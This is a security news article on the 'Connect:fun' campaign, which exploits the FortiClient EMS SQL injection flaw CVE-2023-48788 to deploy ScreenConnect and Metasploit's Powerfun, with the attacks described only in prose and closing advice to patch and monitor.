Cybersecurity experts have identified a new attack campaign that capitalizes on a recently discovered vulnerability in Fortinet FortiClient EMS devices, utilizing ScreenConnect and Metasploit’s Powerfun payloads to execute its malicious intent.
This campaign targets CVE-2023-48788, a critical SQL injection vulnerability with a CVSS score of 9.3. This flaw enables unauthorized attackers to execute commands or code on the affected systems through carefully crafted requests, emphasizing the urgent need for mitigations.
Forescout, a cybersecurity firm, has labeled this operation with the codename Connect:fun, highlighting the exploitation of ScreenConnect and Powerfun for post-exploitation activities. The attack was first noted against an unnamed media organization that had a vulnerable FortiClient EMS instance exposed to the internet.
The incident unfolded shortly after a proof-of-concept exploit for the vulnerability became publicly available on March 21, 2024. In the following days, the attackers attempted to utilize the security weakness to download ScreenConnect and subsequently install it using the msiexec utility, although these initial attempts were unsuccessful.
However, on March 25, the attackers successfully executed PowerShell commands that fetched the Metasploit Powerfun script—initiating a reverse connection to an external IP address. This shift illustrates the adaptive strategies employed by the cybercriminals as they refine their methods in real-time.
Further analysis detected SQL queries attempting to download ScreenConnect from a remote domain, “ursketz[.]com,” employing certutil to facilitate the download. Following this, the software would be installed via msiexec, establishing a connection with a command-and-control (C2) server thereafter.
Investigators believe the threat actor may have been active since at least 2022, with particular focus on exploiting Fortinet devices. The linguistic nuances found within their operational frameworks suggest potential ties to Vietnamese and German domains.
“The activity demonstrates clear manual involvement, indicated by numerous unsuccessful attempts to acquire and install software along with an extended timeframe between efforts,” commented security researcher Sai Molige. This observation supports the notion that the campaign is distinct, rather than part of a broader automated botnet operation.
The tactical approach to this attack shares similarities with other incidents reported in March 2024, by both Palo Alto Networks Unit 42 and Blumira, focusing on the abuse of CVE-2023-48788 to download utilities like ScreenConnect and Atera. As the situation evolves, organizations are urged to implement Fortinet’s patches to safeguard against potential exploits and to monitor network traffic for signs of abnormal activity. Additionally, utilizing a web application firewall (WAF) is recommended to help block any potentially harmful requests.
